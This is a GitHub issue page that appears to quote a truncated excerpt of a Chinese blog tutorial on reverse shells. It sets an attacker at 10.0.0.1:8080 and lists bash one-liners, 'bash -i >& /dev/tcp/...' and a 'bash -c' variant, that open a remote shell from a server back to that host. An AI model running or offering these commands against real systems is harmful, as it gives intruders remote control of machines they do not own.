Skip to content

反弹Shell | Introspelliam #20

@Introspelliam

Description

@Introspelliam

https://introspelliam.github.io/2017/12/09/web/%E5%8F%8D%E5%BC%B9Shell/

假设攻击端为10.0.0.1,接收端口为8080 服务器端为10.0.0.2 1、Bash关于bash中的重定向知识,可以参考shell之后的操作 服务器端: 1bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1bash -c 'sh -i &>/dev/tcp/10.0.0.1/8080 0>&1&a

Metadata

Metadata

Assignees

No one assigned

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions